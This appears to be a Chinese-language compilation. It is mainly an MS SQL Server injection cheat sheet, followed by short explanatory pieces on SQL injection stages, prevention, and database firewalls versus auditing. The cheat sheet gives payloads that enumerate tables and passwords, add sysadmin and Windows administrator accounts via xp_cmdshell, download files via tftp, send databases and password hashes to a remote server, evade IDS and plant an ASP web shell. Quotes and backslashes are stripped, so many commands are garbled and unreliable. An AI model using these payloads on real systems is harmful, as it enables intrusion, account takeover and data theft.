and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 來得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 暴到UID的數值假設為18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個admin的一個欄位，假設為 user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,...)) 來暴出其他的欄位
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用戶名
依次可以得到密碼。假設存在user_id username,password 等欄位
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判斷id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有欄位
id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access也好用）
得到WEB路徑
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread
@rootkey=HKEY_LOCAL_MACHINE,@key= Roots,@value_name=/,
values=@testOUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- 建立image類型的表cmd
存在xp_cmdshell的測試過程：
;exec master..xp_cmdshell dir
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帳號
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes
/active:yes /add;--
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
exec master..xp_servicecontrol start,schele 啟動服務
exec master..xp_servicecontrol start,server
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C：WINNTsystem32
cmd.exe /c net user jiaoniang$ 1866574 /add
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C：WINNTsystem32cmd.exe
/c net localgroup administrators jiaoniang$ /add
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上傳文件
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:
;declare @a sysname set @a=xp+_cm』+』dshell exec @a dir c:
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目錄bak.dat
如果被限制則可以。
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
查詢構造：
SELECT * FROM news WHERE id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
select 123;--
;use master;--
:a or name like fff%;-- 顯示有一個叫ffff的用戶哈。
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
上面的語句是得到資料庫中的第一個用戶表，並把表名放在ffff用戶的郵箱欄位中。
通過查看ffff的用戶資料可得第一個用表叫ad
然後根據表名ad得到這個表的ID 得到第二個表的名字
insert into users values( 666,char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),char(0x63)+char(0x68)+char(0x72)+char
(0x69)+char(0x73),0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123,admin--,password,0xffff)--
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //為access資料庫
枚舉出數據表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
這是將第一個表名更新到aaa的欄位處。
讀出第一個表，第二個表可以這樣讀出來（在條件後加上 and name<>；剛才得到的表名）。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
然後id=1552 and exists(select * from aaa where aaa>5)
讀出第二個表，一個個的讀出，直到沒有為止。
讀欄位是這樣：
;update aaa set aaa=(select top 1 col_name(object_id（表名），1));--
然後id=152 and exists(select * from aaa where aaa>5)出錯，得到欄位名
;update aaa set aaa=(select top 1 col_name(object_id（表名），2));--
然後id=152 and exists(select * from aaa where aaa>5)出錯，得到欄位名
[獲得數據表名][將欄位值更新為表名，再想法讀出這個欄位的值就可得到表名]
update 表名 set 欄位=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>；你得到的表名查出一個加一個])
[ where 條件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2，…）
通過SQLSERVER注入漏洞建資料庫管理員帳號和系統管理員帳號[當前帳號必須是SYSADMIN組]
[獲得數據表欄位名][將欄位值更新為欄位名，再想法讀出這個欄位的值就可得到欄位名]
update 表名 set 欄位=(select top 1 col_name(object_id（要查詢的數據表名），欄位列如：1) [ where 條件]
繞過IDS的檢測[使用變數]
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:
;declare @a sysname set @a=xp+_cm』+』dshell exec @a dir c:
開啟遠程資料庫
基本語法
select * from OPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select * from table1 )
參數： (1) OLEDB Provider name
其中連接字元串參數可以是任何埠用來連接，比如
select * from OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table
復制目標主機的整個資料庫insert所有遠程表到本地表。
基本語法：
insert into OPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select * from table1) select * from table2
這行語句將目標主機上table2表中的所有數據復制到遠程資料庫中的table1表中。實際運用中適當修改連接字元串的IP地址和埠，指向需要的地方，比如：
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from
table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
select * from user_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
select * from user_database.dbo.syscolumns
復制資料庫：
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * fromdatabase..table2
復制哈西表（HASH）登錄密碼的hash存儲於sysxlogins中。方法如下：
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select
* from database.dbo.sysxlogins
得到hash之後，就可以進行暴力破解。
遍歷目錄的方法：先創建一個臨時表：temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 獲得當前所有驅動器
;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 獲得子目錄列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 獲得所有子目錄的目錄樹結構，並寸入temp表中
;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看某個文件的內容
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:;--
;insert into temp(id) exec master.dbo.xp_cmdshell dir c: *.asp /s/a;--
;insert into temp(id) exec master.dbo.xp_cmdshell cscript. C:InetpubAdminScriptsadsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- （xp_dirtree適用許可權PUBLIC）
寫入表：
語句1：and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
語句2：and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
語句3：and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
語句4：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
語句5：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
語句6：and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
語句7：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
語句8：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
語句9：and 1=(SELECT IS_MEMBER(db_owner));--
把路徑寫到表中去：
;create table dirs(paths varchar(100),id int)--
;insert dirs exec master.dbo.xp_dirtree c:--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
;create table dirs1(paths varchar(100),id int)--
;insert dirs exec master.dbo.xp_dirtree e:web--
and 0<>(select top 1 paths from dirs1)--
把資料庫備份到網頁目錄：下載
;declare @a sysname; set @a=db_name();backup database @a to disk=e:webdown.bak;--
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 參看相關表。
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
-=-wscript.shellexample -=-
declare @o int
exec sp_oacreate wscript.shell,@o out
exec sp_oamethod @o,run,NULL,notepad.exe
; declare @o int exec sp_oacreate wscript.shell,@o out exec sp_oamethod @o,run,NULL,notepad.exe--
declare @o int,@f int,@t int,@ret int
declare @line varchar(8000)
exec sp_oacreate scripting.filesystemobject,@o out
exec sp_oamethod @o,opentextfile,@f out,c:oot.ini,1
exec @ret = sp_oamethod @f,readline,@line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f,readline,@line out
end
declare @o int,@f int,@t int,@ret int
exec sp_oacreate scripting.filesystemobject,@o out
exec sp_oamethod @o,createtextfile,@f out,c:inetpubwwwrootfoo.asp,1
exec @ret = sp_oamethod @f,writeline,NULL,
<% set o = server.createobject(wscript.shell): o.run( request.querystring(cmd) ) %>
declare @o int,@ret int
exec sp_oacreate speech.voicetext,@o out
exec sp_oamethod @o,register,NULL,foo,bar
exec sp_oasetproperty @o,speed,150
exec sp_oamethod @o,speak,NULL,all your sequel servers are belong to,us,528 waitfor delay 00:00:05
; declare @o int,@ret int exec sp_oacreate speech.voicetext,@o out exec sp_oamethod @o,register,NULL,foo,bar exec
sp_oasetproperty @o,speed,150 exec sp_oamethod @o,speak,NULL,all your sequel servers are belong to us,528 waitfor delay 00:00:05--
xp_dirtree適用許可權PUBLIC
exec master.dbo.xp_dirtree c:
返回的信息有兩個欄位subdirectory、depth。Subdirectory欄位是字元型，depth欄位是整形欄位。
create table dirs(paths varchar(100),id int)
建表，這里建的表是和上面xp_dirtree相關連，欄位相等、類型相同。
insert dirs exec master.dbo.xp_dirtree c:
只要我們建表與存儲進程返回的欄位相定義相等就能夠執行！達到寫表的效果.

㈥什麼是盲目的SQL 注入

SQL注入：利用現有應用程序，將(惡意)的SQL命令注入到後台資料庫引擎執行的能力，這是SQL注入的標准釋義。
隨著B/S模式被廣泛的應
用，用這種模式編寫應用程序的程序員也越來越多，但由於開發人員的水平和經驗參差不齊，相當一部分的開發人員在編寫代碼的時候，沒有對用戶的輸入數據或者
是頁面中所攜帶的信息（如Cookie）進行必要的合法性判斷，導致了攻擊者可以提交一段資料庫查詢代碼，根據程序返回的結果，獲得一些他想得到的數據。

SQL注入利用的是正常的HTTP服務埠，表面上看來和正常的web訪問沒有區別，隱蔽性極強，不易被發現。
SQL注入攻擊過程分為五個步驟：
第一步：判斷Web環境是否可以SQL注入。如果URL僅是對網頁的訪問，不存在SQL注入問題，如：http://www.../162414739931.shtml就是普通的網頁訪問。只有對資料庫進行動態查詢的業務才可能存在SQL注入，如：http://www...../webhp?id＝39，其中?id＝39表示資料庫查詢變數，這種語句會在資料庫中執行，因此可能會給資料庫帶來威脅。
第二步：尋找SQL注入點。完成上一步的片斷後，就要尋找可利用的注入漏洞，通過輸入一些特殊語句，可以根據瀏覽器返回信息，判斷資料庫類型，從而構建資料庫查詢語句找到注入點。

第三步：猜解用戶名和密碼。資料庫中存放的表名、欄位名都是有規律可言的。通過構建特殊資料庫語句在資料庫中依次查找表名、欄位名、用戶名和密碼的長度，以及內容。這個猜測過程可以通過網上大量注入工具快速實現，並藉助破解網站輕易破譯用戶密碼。

第四步：尋找WEB管理後台入口。通常WEB後台管理的界面不面向普通用戶

開放，要尋找到後台的登陸路徑，可以利用掃描工具快速搜索到可能的登陸地址，依次進行嘗試，就可以試出管理台的入口地址。

第五步：入侵和破壞。成功登陸後台管理後，接下來就可以任意進行破壞行為，如篡改網頁、上傳木馬、修改、泄漏用戶信息等，並進一步入侵資料庫伺服器。
SQL注入攻擊的特點:

變種極多，有經驗的攻擊者會手動調整攻擊參數，致使攻擊數據的變種是不可枚舉的，這導致傳統的特徵匹配檢測方法僅能識別相當少的攻擊，難以防範。

攻擊過程簡單，目前互聯網上流行眾多的SQL注入攻擊工具，攻擊者藉助這些工具可很快對目標WEB系統實施攻擊和破壞。

危害大，由於WEB編程語言自身的缺陷以及具有安全編程能力的開發人員少之又少，大多數WEB業務系統均具有被SQL注入攻擊的可能。而攻擊者一旦攻擊成功，可以對控制整個WEB業務系統，對數據做任意的修改，破壞力達到及至。

SQL注入的危害和現狀

SQL注入的主要危害包括：

未經授權狀況下操作資料庫中的數據

惡意篡改網頁內容

私自添加系統帳號或者是資料庫使用者帳號

網頁掛木馬

如何防止SQL參數：
1，檢查上傳的數據，並過濾
2. 禁止拼接SQL字元串
3.使用SQL參數化處理
4．載入防入侵等硬體設施

㈦資料庫審計和資料庫防火牆的區別

我認為資料庫防火牆不同於大家更為熟悉的資料庫審計，根本區別在於兩者防護原理有本質區別，資料庫審計更像是攝像頭，旁路監控資料庫訪問，發現威脅進行告警，但不做實質上的防禦，實際上更偏向事後的追溯。而防火牆則更為直接，可以通過直接串聯或旁路部署的方式，對應用與資料庫之間的訪問進行阻斷攔截等操作，攔截阻斷安全威脅，起到事中防護的作用。
資料庫防火牆是串聯部署，串聯模式部署在應用系統與資料庫之間，所有SQL語句必須經過資料庫防火牆的審核後才能到達資料庫，發起訪問、操作。基於漏洞特徵庫、SQL注入特徵庫、黑白名單等的細粒度安全策略制定，結合訪問源、訪問對象、訪問行為、影響行數等准確解析結果，識別惡意資料庫指令，及時採取中斷會話或准確攔截語句的防禦行為，串聯部署最大的風險在於不能出現誤判斷，影響正常語句通過，這就要求資料庫防火牆的語句解析能力足夠精準，並且能夠建立非常完善的行為模型，在發現危險語句時，能夠在不中斷會話的基礎上，准確攔截風險語句，放行正常訪問。因此，要想真正發揮防護效果，資料庫防火牆必須串聯在資料庫的前端，可以是物理的（透明串接）或邏輯的（代理）串聯。
資料庫審計是旁路部署，是一款面向資料庫可提供安全、審計、監控能力的一體化工具。能對資料庫遭受到的風險行為進行告警，如：資料庫漏洞攻擊、SQL注入攻擊、高危風險操作等，旁路分析識別後再發出阻斷請求。兩者的區別還是很大的，安華金和專注數據安全行業，推薦你找他們了解下。更多內容可以網路一下。

㈧ sql注入後的網站特點

所謂SQL注入，就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字元串，最終達到欺騙伺服器執行惡意的SQL命令。這對做web程序開發的而言是非常熟悉的。
//並不是LZ說的那樣。沒這么玄乎。

㈨資料庫防火牆是什麼

資料庫防火牆（簡稱：DCAP-DF）是以攻擊防護和敏感數據保護為核心的專業級資料庫安全防護設備。DCAP-DF主要部署在業務應用側，用於防止外部黑客的資料庫入侵行為。DCAP-DF採用全面的資料庫通訊協議解析，通過 SQL協議分析，和SQL注入特徵抽象技術，能快速有效的捕獲SQL注入的行為特徵，根據預定的SQL白名單策略決定讓合法的 SQL 操作通過執行，對符合SQL注入特徵的可疑的非法違規操作進行阻斷，從而形成一個資料庫的外圍防禦圈, 真正做到SQL 危險操作的主動預防、實時審計。
1.1 保障核心資料庫的安全
DCAP-DF可幫助用戶及時發現針對資料庫的各類攻擊行為和安全隱患，包括利用資料庫漏洞進行攻擊、利用應用程序進行SQL輸入攻擊等，有效保障資料庫及核心數據安全。同時，靈活、便利的策略定製可提升對於資料庫訪問的可控度。
1.2 可視化風險監控大屏展示
支持對注入攻擊、漏洞攻擊、敏感數據訪問、系統運行、流量等各類風險及指標進行全方位監控，並內置分析演算法，對各類指標項進行集中展示，用戶通過肉眼即可直觀感知到資料庫當前的安全狀態、運行狀態，一旦有異常，用戶可根據大屏進行問題的快速定位，處理更高效。
1.3 滿足合規/審計要求
內置各類合規性報表，用戶可自主選擇行業及法律法規報表，簡化合規/審計工作。

㈩ SQL注入攻擊有哪些主要的特點

1、變種極多
有經驗的攻擊者，也就是黑客會手工調整攻擊的參數，致使攻擊的數據是不可枚舉的，這導致傳統的特徵匹配方法僅能識別到相當少的攻擊。或者是最常規的攻擊，難以做到防範。
2、攻擊簡單
攻擊過程簡單，目前互聯網上流行的眾多SQL注入攻擊工具，攻擊者藉助這些工具可以很快的對目標網站進行攻擊或者是破壞，危害大。
3、危害極大
由於web語言自身的缺陷，以及具有安全編程的開發人員較少，大多數web應用系統均具有被SQL注入攻擊的可能，而攻擊者一旦攻擊成功，就可以對控制整個web應用系統對數據做任何的修改或者是竊取，破壞力達到了極致。

sql注入特徵

與sql注入特徵相關的內容